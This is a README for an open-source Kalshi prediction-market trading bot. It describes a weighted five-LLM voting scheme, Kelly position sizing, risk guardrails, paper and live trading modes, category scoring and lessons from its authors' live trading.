An autonomous trading bot for Kalshi prediction markets powered by a five-model AI ensemble.
Five frontier LLMs debate every trade. The system only enters when they agree.
Quick Start · Features · How It Works · Configuration · Contributing · Kalshi API Docs
⚠️ Disclaimer: This is experimental software for educational and research purposes only. Trading involves substantial risk of loss. Only trade with capital you can afford to lose. Past performance does not guarantee future results. This software is not financial advice. The authors are not responsible for any financial losses incurred through the use of this software.
Why Discipline Mode Exists: Through extensive live trading on Kalshi across multiple strategies, we learned that trading without category enforcement and risk guardrails leads to significant losses. The most common mistakes were over-allocating to economic events (CPI, Fed decisions) with no real edge and using aggressive position sizing. The consistently profitable edge we found was NCAAB NO-side trading (74% win rate, +10% ROI). This repo now ships with discipline systems enabled by default: category scoring, portfolio enforcement, and sane risk parameters.
Three steps to get running in paper-trading mode (no real money):
# 1. Clone and set up
git clone https://github.com/ryanfrigo/kalshi-ai-trading-bot.git
cd kalshi-ai-trading-bot
python setup.py # creates .venv, installs deps, checks config
# 2. Add your API keys
cp env.template .env # then open .env and fill in KALSHI_API_KEY,
# XAI_API_KEY, and OPENROUTER_API_KEY
# 3. Run in disciplined mode (default: category scoring + guardrails)
python cli.py run --paper
# Or run the safe compounder (NO-side edge-based, most conservative)
python cli.py run --safe-compounder
Then open the live dashboard in another terminal:
python cli.py dashboard
Need API keys?
- Kalshi key + private key: kalshi.com/account/settings (API docs)
- xAI key: console.x.ai
- OpenRouter key: openrouter.ai
- Five frontier LLMs collaborate on every decision: Grok-4, Claude Sonnet 4, GPT-4o, Gemini 2.5 Flash, DeepSeek R1
- Role-based specialization: each model plays a distinct analytical role (forecaster, bull, bear, risk manager, news analyst)
- Consensus gating: positions are skipped when models diverge beyond a configurable confidence threshold
- Deterministic outputs: temperature=0 for reproducible AI reasoning
- Directional trading (50% of capital): AI-predicted probability edge with Kelly Criterion sizing
- Market making (40%): automated limit orders capturing bid-ask spread
- Arbitrage detection (10%): cross-market opportunity scanning
- Fractional Kelly position sizing (0.75x Kelly for volatility control)
- Hard daily loss limit: stops trading at 15% drawdown
- Max drawdown circuit breaker: halts at 50% portfolio drawdown
- Sector concentration cap: no more than 90% in any single category
- Daily AI cost budget: stops spending when API costs hit $50/day
- Trailing take-profit at 20% gain
- Stop-loss at 15% per position
- Confidence-decay exits when AI conviction drops
- Time-based exits (10-day max hold)
- Volatility-adjusted thresholds
- Real-time Streamlit dashboard: portfolio value, positions, P&L, AI decision logs
- Paper trading mode: simulate trades without real orders; track outcomes on settled markets
- SQLite telemetry: every trade, AI decision, and cost metric logged locally
- Unified CLI: run, dashboard, status, health, backtest commands
The bot runs a four-stage pipeline on a continuous loop:
INGEST → DECIDE (5-Model Ensemble) → EXECUTE → TRACK
- INGEST: Kalshi REST API, WebSocket stream, RSS / news feeds, volume and price data
- DECIDE: Grok-4 (Forecaster, 30%), Claude (News Analyst, 20%), GPT-4o (Bull Case, 20%), Gemini (Bear Case, 15%), DeepSeek (Risk Manager, 15%); debate → consensus, confidence calibration
- EXECUTE: Kalshi order router, Kelly sizing
- TRACK: P&L, win rate, Sharpe, drawdown, cost budget
Market data, order book snapshots, and news feeds are pulled via the Kalshi REST API and WebSocket stream. RSS feeds from financial news sources supplement the signal.
Each of the five models analyzes the incoming data from its assigned perspective and returns a probability estimate + confidence score. The ensemble combines weighted votes:
| Model | Role | Weight |
|---|---|---|
| Grok-4 (xAI) | Lead Forecaster | 30% |
| Claude Sonnet 4 (OpenRouter) | News Analyst | 20% |
| GPT-4o (OpenRouter) | Bull Researcher | 20% |
| Gemini 2.5 Flash (OpenRouter) | Bear Researcher | 15% |
| DeepSeek R1 (OpenRouter) | Risk Manager | 15% |
If the weighted confidence falls below min_confidence_to_trade (default: 0.50), the opportunity is skipped. If models disagree significantly, position size is automatically reduced.
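As a rough illustration of the weighted vote and consensus gate described above, here is a minimal sketch. The `ModelVote` type, the `combine_votes` function, the `max_spread` disagreement threshold, and the 0.5 size reduction are hypothetical names and values chosen for the example; only the weights and `min_confidence_to_trade` come from this README.

```python
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass
class ModelVote:
    name: str
    weight: float       # ensemble weight from the table above
    probability: float  # model's estimate that the market resolves YES
    confidence: float   # model's self-reported confidence in [0, 1]


def combine_votes(
    votes: List[ModelVote],
    min_confidence_to_trade: float = 0.50,
    max_spread: float = 0.25,  # hypothetical disagreement threshold
) -> Optional[Tuple[float, float, float]]:
    """Return (probability, confidence, size_multiplier), or None to skip."""
    total_weight = sum(v.weight for v in votes)
    probability = sum(v.weight * v.probability for v in votes) / total_weight
    confidence = sum(v.weight * v.confidence for v in votes) / total_weight
    if confidence < min_confidence_to_trade:
        return None  # weighted confidence too low: skip the opportunity
    # Treat a wide gap between the highest and lowest estimate as disagreement
    spread = max(v.probability for v in votes) - min(v.probability for v in votes)
    size_multiplier = 0.5 if spread > max_spread else 1.0  # assumed reduction
    return probability, confidence, size_multiplier


votes = [
    ModelVote("grok-4", 0.30, 0.60, 0.70),
    ModelVote("claude", 0.20, 0.55, 0.60),
    ModelVote("gpt-4o", 0.20, 0.65, 0.80),
    ModelVote("gemini", 0.15, 0.50, 0.50),
    ModelVote("deepseek", 0.15, 0.58, 0.60),
]
result = combine_votes(votes)
```

The actual aggregation in `EnsembleConfig` may differ; this only shows the shape of the calculation.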
Qualifying trades are sized using the Kelly Criterion (fractional 0.75x) and routed through Kalshi's order API. Market-making orders are placed symmetrically around the mid-price.
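For intuition, fractional Kelly sizing on a binary contract can be sketched as follows. This assumes a contract bought at `price` (in dollars, between 0 and 1) that pays $1 on a win, ignores fees, and uses hypothetical function names; the bot's own sizing code may differ. With net odds b = (1 - price) / price, the Kelly fraction (b·p - q) / b simplifies to (p - price) / (1 - price).

```python
def kelly_fraction_binary(p_win: float, price: float) -> float:
    """Full-Kelly fraction of bankroll for a $1-payout contract bought at `price`."""
    if not 0.0 < price < 1.0:
        raise ValueError("price must be strictly between 0 and 1")
    # Negative edge gives a negative fraction; clamp to zero (no bet)
    return max(0.0, (p_win - price) / (1.0 - price))


def position_size(
    balance: float,
    p_win: float,
    price: float,
    kelly_multiplier: float = 0.75,      # kelly_fraction in settings.py
    max_position_size_pct: float = 5.0,  # per-position cap in settings.py
) -> float:
    """Dollar amount to allocate: fractional Kelly, capped per position."""
    fraction = kelly_multiplier * kelly_fraction_binary(p_win, price)
    fraction = min(fraction, max_position_size_pct / 100.0)
    return balance * fraction


capped = position_size(1000.0, p_win=0.60, price=0.50)    # cap applies
uncapped = position_size(1000.0, p_win=0.52, price=0.50)  # below the cap
```

In the first call the 0.75x Kelly fraction (15% of balance) exceeds the 5% cap, so the cap determines the size; in the second the Kelly fraction itself is the binding limit.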
Every decision is written to a local SQLite database. The dashboard and --stats commands surface cumulative P&L, win rate, Sharpe ratio, and per-strategy breakdowns in real time.
- Python 3.12 or later
- A Kalshi account with API access (API docs)
- An xAI API key (Grok-4)
- An OpenRouter API key (Claude, GPT-4o, Gemini, DeepSeek)
The setup script will:
- Check Python version compatibility
- Create virtual environment
- Install all dependencies (with Python 3.14 compatibility handling)
- Test that the dashboard can run
- Print troubleshooting guidance
git clone https://github.com/ryanfrigo/kalshi-ai-trading-bot.git
cd kalshi-ai-trading-bot
python -m venv .venv
source .venv/bin/activate # macOS / Linux
# .venv\Scripts\activate # Windows
# Python 3.14 users only:
export PYO3_USE_ABI3_FORWARD_COMPATIBILITY=1
pip install -r requirements.txt
cp env.template .env # fill in your keys
| Variable | Description |
|---|---|
| KALSHI_API_KEY | Your Kalshi API key ID |
| XAI_API_KEY | xAI key for Grok-4 |
| OPENROUTER_API_KEY | OpenRouter key (Claude, GPT-4o, Gemini, DeepSeek) |
| OPENAI_API_KEY | Optional fallback |
Place your Kalshi private key as kalshi_private_key (no extension) in the project root. Download it from Kalshi Settings → API. This file is git-ignored.
python -m src.utils.database
⚠️ Use the -m flag: running python src/utils/database.py directly will fail with a module import error.
# Paper trading (no real orders; safe to test)
python cli.py run --paper
# Live trading (real money)
python cli.py run --live
# Launch monitoring dashboard
python cli.py dashboard
# Check portfolio balance and open positions
python cli.py status
# Verify all API connections
python cli.py health
Or invoke the bot script directly:
python beast_mode_bot.py # Paper trading
python beast_mode_bot.py --live # Live trading
python beast_mode_bot.py --dashboard # Dashboard mode
Simulate trades without risking real money. Every signal is logged to SQLite and a static HTML dashboard renders cumulative P&L, win rate, and per-signal details after markets settle.
# Scan markets and log signals
python paper_trader.py
# Continuous scanning every 15 minutes
python paper_trader.py --loop --interval 900
# Settle markets and update outcomes
python paper_trader.py --settle
# Regenerate HTML dashboard
python paper_trader.py --dashboard
# Print stats to terminal
python paper_trader.py --stats
The dashboard writes to docs/paper_dashboard.html; open it locally or host it via GitHub Pages.
kalshi-ai-trading-bot/
├── beast_mode_bot.py # Main bot entry point
├── cli.py # Unified CLI: run, dashboard, status, health, backtest
├── paper_trader.py # Paper trading signal tracker
├── pyproject.toml # PEP 621 project metadata
├── requirements.txt # Pinned dependencies
├── env.template # Environment variable template
├── src/
│   ├── agents/ # Multi-model ensemble (forecaster, bull/bear, risk, trader)
│   ├── clients/ # API clients (Kalshi, xAI, OpenRouter, WebSocket)
│   ├── config/ # Settings and trading parameters
│   ├── data/ # News aggregation and sentiment analysis
│   ├── events/ # Async event bus for real-time streaming
│   ├── jobs/ # Core pipeline: ingest, decide, execute, track, evaluate
│   ├── strategies/ # Market making, portfolio optimization, quick flip
│   └── utils/ # Database, logging, prompts, risk helpers
├── scripts/ # Utility and diagnostic scripts
├── docs/ # Additional documentation + paper dashboard HTML
└── tests/ # Pytest test suite
All trading parameters live in src/config/settings.py:
# Position sizing
max_position_size_pct = 5.0 # Max 5% of balance per position
max_positions = 15 # Up to 15 concurrent positions
kelly_fraction = 0.75 # Fractional Kelly multiplier
# Market filtering
min_volume = 200 # Minimum contract volume
max_time_to_expiry_days = 30 # Trade contracts up to 30 days out
min_confidence_to_trade = 0.50 # Minimum ensemble confidence to enter
# AI settings
primary_model = "grok-4"
ai_temperature = 0 # Deterministic outputs
ai_max_tokens = 8000
# Risk management
max_daily_loss_pct = 15.0 # Hard daily loss limit
daily_ai_cost_limit = 50.0 # Max daily AI API spend (USD)
The ensemble configuration (model roster, weights, debate settings) lives in EnsembleConfig in the same file.
Every trade, AI decision, and cost metric is recorded to trading_system.db (local SQLite). Use the dashboard or scripts in scripts/ to review:
- Cumulative P&L and win rate
- Sharpe ratio and maximum drawdown
- AI confidence calibration
- Cost per trade and daily API budget utilization
- Per-strategy breakdowns (directional vs. market making)
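A per-strategy summary of this kind could be pulled from SQLite with a query along these lines. The `trades` table and its `strategy` and `pnl` columns are a hypothetical schema invented for this sketch (the real layout of trading_system.db is not documented here), and the rows are illustrative only, so the example runs against an in-memory database.

```python
import sqlite3


def strategy_summary(conn: sqlite3.Connection) -> list:
    """Trade count, total P&L, and win rate per strategy (hypothetical schema)."""
    rows = conn.execute(
        """
        SELECT strategy,
               COUNT(*),
               SUM(pnl),
               AVG(CASE WHEN pnl > 0 THEN 1.0 ELSE 0.0 END)
        FROM trades
        GROUP BY strategy
        ORDER BY strategy
        """
    ).fetchall()
    return [
        {"strategy": s, "trades": n, "total_pnl": total, "win_rate": wr}
        for s, n, total, wr in rows
    ]


# Illustrative in-memory data, not real results
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE trades (strategy TEXT, pnl REAL)")
conn.executemany(
    "INSERT INTO trades VALUES (?, ?)",
    [("directional", 12.0), ("directional", -5.0), ("market_making", 1.5)],
)
summary = strategy_summary(conn)
```

To try it against the real database, inspect the actual table names first (for example with `SELECT name FROM sqlite_master`) and adapt the query.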
pytest tests/ # full suite
pytest tests/ -v # verbose
pytest --cov=src # with coverage
black src/ tests/ cli.py beast_mode_bot.py
isort src/ tests/ cli.py beast_mode_bot.py
mypy src/
- Create a module in src/strategies/
- Wire it into src/strategies/unified_trading_system.py
- Set allocation percentage in src/config/settings.py
- Add tests in tests/
Bot not placing live trades despite --live flag
Check logs for the mode confirmation string:
grep -i "live trading\|paper trading\|LIVE ORDER\|PAPER TRADE" logs/trading_system.log | tail -20
- "LIVE TRADING MODE ENABLED" → correct
- "Paper trading mode" → still in paper mode; verify API key has TRADING permissions in Kalshi Settings
Dashboard won't launch / import errors
Import errors in VS Code are IDE linter warnings, not runtime errors.
# Fix: activate venv, then run from project root
source .venv/bin/activate
python beast_mode_dashboard.py
Set the VS Code Python interpreter to .venv/bin/python via Cmd+Shift+P → Python: Select Interpreter.
Python 3.14 PyO3 compatibility error
# Quick fix
export PYO3_USE_ABI3_FORWARD_COMPATIBILITY=1
pip install -r requirements.txt
# Recommended: use Python 3.13
pyenv install 3.13.1 && pyenv local 3.13.1
python -m venv .venv && source .venv/bin/activate
pip install -r requirements.txt
Contributions are welcome! See CONTRIBUTING.md for full guidelines.
Quick steps:
- Fork the repository
- Create a feature branch: git checkout -b feature/your-feature
- Make changes, add tests, run pytest and black
- Commit with conventional commit format: feat: add new model weight config
- Open a Pull Request
Good first issues: look for the good first issue label.
The bot now supports three distinct trading modes. Disciplined is the default.
The safe, category-aware mode. Runs the AI ensemble but with guardrails:
python cli.py run --paper # Paper trading (safe, no real money)
python cli.py run --live # Live trading with discipline enforced
python cli.py run --disciplined # Explicit flag (same as default)
Settings enforced:
- Max drawdown: 15% (vs 50% in beast mode)
- Min confidence: 65% (vs 50% in beast mode)
- Max position size: 3% of portfolio
- Max sector concentration: 30%
- Kelly fraction: 0.25 (quarter-Kelly)
- Category scoring active: blocks categories with score < 30
The most conservative and historically validated strategy:
python cli.py run --safe-compounder # Dry run (shows opportunities)
python cli.py run --safe-compounder --live # Live execution
Strategy rules:
- NO side ONLY: never buys YES
- YES last price must be ≤ 20¢ (near-certain NO outcome)
- NO ask must be > 80¢
- Edge (EV - price) must be > 5¢
- Places resting maker orders at lowest_ask - 1¢ (near-zero fees)
- Max 10% of portfolio per position (half-Kelly sizing)
- Skips all sports, entertainment, and "mention" markets
This strategy is the closest thing to a pure edge play on Kalshi.
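The entry rules above could be expressed as a single filter, roughly as sketched below. `MarketSnapshot`, its field names, and the category labels are hypothetical, and two points are assumptions rather than documented behavior: EV is taken as the estimated NO probability times 100¢, and the edge is measured against the lowest NO ask.

```python
from dataclasses import dataclass
from typing import Optional

# Assumed labels for the excluded market types
EXCLUDED_CATEGORIES = {"sports", "entertainment", "mention"}


@dataclass
class MarketSnapshot:
    category: str
    yes_last_price: int        # cents
    no_lowest_ask: int         # cents
    est_no_probability: float  # estimated probability that NO wins


def safe_compounder_limit_price(m: MarketSnapshot) -> Optional[int]:
    """Return the NO-side limit price in cents, or None if any rule fails."""
    if m.category in EXCLUDED_CATEGORIES:
        return None
    if m.yes_last_price > 20:   # YES last price must be <= 20 cents
        return None
    if m.no_lowest_ask <= 80:   # NO ask must be > 80 cents
        return None
    expected_value = m.est_no_probability * 100  # assumed EV definition
    if expected_value - m.no_lowest_ask <= 5:    # edge must be > 5 cents
        return None
    return m.no_lowest_ask - 1  # rest one cent below the lowest ask


good = safe_compounder_limit_price(MarketSnapshot("politics", 8, 90, 0.97))
thin = safe_compounder_limit_price(MarketSnapshot("politics", 8, 90, 0.94))
```

Here `good` passes every rule and yields a resting order price one cent under the ask, while `thin` is rejected because its edge is only about 4¢.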
⚠️ Not recommended. Aggressive settings with no category guardrails have historically led to significant losses in live prediction market trading.
The original aggressive mode with minimal guardrails. Available for comparison/research:
python cli.py run --beast --paper # Only run beast mode in paper trading
Aggressive settings:
- Max drawdown: 50%
- Min confidence: 50%
- Max position: 5%
- Sector cap: 90%
- Kelly fraction: 0.75
The category scorer evaluates each Kalshi market category on a 0-100 scale and enforces allocation limits.
| Factor | Weight | Description |
|---|---|---|
| ROI | 40% | Average return on investment across all trades |
| Recent Trend | 25% | Direction of last 10 trades (recency-weighted) |
| Sample Size | 20% | More data = more confidence in the score |
| Win Rate | 15% | Percentage of winning trades |
| Score Range | Max Position Size | Status |
|---|---|---|
| 80-100 | 20% of portfolio | STRONG |
| 60-79 | 10% of portfolio | GOOD 🟢 |
| 40-59 | 5% of portfolio | WEAK 🟡 |
| 20-39 | 2% of portfolio | POOR 🟠 |
| 0-19 | 0% (blocked) | BLOCKED 🚫 |
Categories scoring below 30 are hard-blocked: the bot will not enter any trade in those categories regardless of AI confidence.
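The two tables and the hard-block rule can be combined in a small lookup, sketched here under stated assumptions. It assumes each factor has already been normalized to a 0-100 sub-score (the normalization itself is not described in this README), and it applies the below-30 hard block before the tier lookup, so scores from 20 to 29 come out blocked in this sketch. Function and constant names are hypothetical.

```python
from typing import Dict, Tuple

# Factor weights from the first table
FACTOR_WEIGHTS = {
    "roi": 0.40,
    "recent_trend": 0.25,
    "sample_size": 0.20,
    "win_rate": 0.15,
}

# (minimum score, max allocation as fraction of portfolio, status)
ALLOCATION_TIERS = [
    (80, 0.20, "STRONG"),
    (60, 0.10, "GOOD"),
    (40, 0.05, "WEAK"),
    (20, 0.02, "POOR"),
]
HARD_BLOCK_BELOW = 30


def composite_score(sub_scores: Dict[str, float]) -> float:
    """Weighted sum of 0-100 sub-scores (normalization is assumed upstream)."""
    return sum(FACTOR_WEIGHTS[name] * sub_scores[name] for name in FACTOR_WEIGHTS)


def max_allocation(score: float) -> Tuple[float, str]:
    """Map a category score to (max allocation fraction, status)."""
    if score < HARD_BLOCK_BELOW:
        return 0.0, "BLOCKED"  # hard block takes precedence over the tiers
    for floor, allocation, status in ALLOCATION_TIERS:
        if score >= floor:
            return allocation, status
    return 0.0, "BLOCKED"


score = composite_score(
    {"roi": 80, "recent_trend": 60, "sample_size": 50, "win_rate": 74}
)
allocation, status = max_allocation(score)
```

With these illustrative sub-scores the composite lands in the 60-79 band, which caps the category at 10% of the portfolio.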
python cli.py scores
Example output:
======================================================================
CATEGORY SCORES
Category Score WR ROI Trades Alloc Status
------------------ ------ ------ -------- ------- ------ ----------
NCAAB 72.3 74% +10.0% 50 10% GOOD 🟢
NBA 41.2 52% +1.5% 28 5% WEAK 🟡
POLITICS 31.0 48% -8.0% 15 2% MARGINAL 🔴
CPI 8.4 25% -65.0% 20 0% BLOCKED 🚫
FED 12.1 32% -40.0% 25 0% BLOCKED 🚫
ECON_MACRO 10.5 30% -55.0% 40 0% BLOCKED 🚫
======================================================================
The scorer is pre-seeded with real historical data:
- NCAAB: 74% win rate, +10% ROI → score ~72 → allowed at 10% allocation
- ECON/CPI: 25% win rate, -65% ROI → score ~8 → blocked
- FED: 32% win rate, -40% ROI → score ~12 → blocked
python cli.py history # Last 50 trades with category breakdown
python cli.py history --limit 100 # Last 100 trades
After extensive live trading across multiple strategies, here's what the data taught:
The AI ensemble can be 80% confident on a CPI trade and still be wrong. Market-implied probabilities on economic releases are already efficient; there's no structural edge for a retail bot. The bot was trading these with the same aggression as sports markets where it had actual edge.
Fix: Category scoring now hard-blocks economic markets until they prove a positive edge over ? trades.
A Kelly fraction of 0.75 sounds reasonable. It's not: it compounds losses catastrophically. At 0.75x Kelly with a 45% win rate, you can lose 80% of capital in a standard drawdown scenario.
Fix: Default is now 0.25x Kelly (quarter-Kelly), which is more conservative than most professional traders use.
A 50% drawdown limit means you can lose half your money before the bot stops. That's not a limit; it's a suggestion. A 15% limit forces the bot to stop while you still have capital to analyze and adjust.
Fix: 15% max drawdown, with the circuit breaker actually stopping trades (not just logging a warning).
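A circuit breaker that actually halts trading, rather than only logging, might look roughly like this. The class name and interface are hypothetical; the sketch measures drawdown from the highest portfolio value seen so far and latches once the limit is hit, which is one reasonable reading of "stopping trades" but not necessarily the bot's exact behavior.

```python
class DrawdownCircuitBreaker:
    """Halts trading once drawdown from the running peak reaches the limit."""

    def __init__(self, max_drawdown_pct: float = 15.0) -> None:
        self.max_drawdown_pct = max_drawdown_pct
        self.peak_value = 0.0
        self.halted = False

    def update(self, portfolio_value: float) -> bool:
        """Record the latest portfolio value; return True if trading may continue."""
        self.peak_value = max(self.peak_value, portfolio_value)
        if self.peak_value > 0:
            drawdown_pct = (
                100.0 * (self.peak_value - portfolio_value) / self.peak_value
            )
            if drawdown_pct >= self.max_drawdown_pct:
                self.halted = True  # latch: stays halted until manually reset
        return not self.halted


breaker = DrawdownCircuitBreaker(max_drawdown_pct=15.0)
# Peak is 1100; 950 is about a 13.6% drawdown, 930 is about 15.5%
states = [breaker.update(v) for v in (1000.0, 1100.0, 950.0, 930.0, 1200.0)]
```

Note that the final value of 1200 does not re-enable trading: once tripped, the breaker stays halted so a human can review before resuming.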
When 90% of capital is in economic categories and there's a Fed meeting, everything moves together. Correlated losses compound faster than diversified losses.
Fix: 30% sector cap means no single category can dominate the portfolio.
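A sector cap check before opening a position can be as simple as the sketch below. The function name and the representation of positions as `(category, dollar_amount)` pairs are assumptions made for illustration.

```python
from typing import Iterable, Tuple


def can_add_position(
    positions: Iterable[Tuple[str, float]],  # (category, dollar amount) pairs
    category: str,
    new_amount: float,
    portfolio_value: float,
    sector_cap: float = 0.30,
) -> bool:
    """True if adding `new_amount` keeps the category at or under the cap."""
    current = sum(amount for cat, amount in positions if cat == category)
    return (current + new_amount) / portfolio_value <= sector_cap


open_positions = [("NCAAB", 200), ("NBA", 100)]
at_cap = can_add_position(open_positions, "NCAAB", 100, 1000)    # exactly 30%
over_cap = can_add_position(open_positions, "NCAAB", 150, 1000)  # 35%
```

Exposure is measured against total portfolio value here; measuring against deployed capital instead would make the cap stricter.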
The bot was scanning every 30 seconds and trading everything it found. More trades with no edge = faster path to zero.
Fix: 60-second scan interval. Trades only when confidence ≥ 65% AND category score ≥ 30.
- Kalshi Trading API Docs
- Kalshi API Authentication
- Kalshi Markets Overview
- OpenRouter Model Catalog
- xAI API (Grok)
This project is licensed under the MIT License. See LICENSE for details.
If this project is useful to you, consider giving it a star.
Made with ❤️ for the Kalshi trading community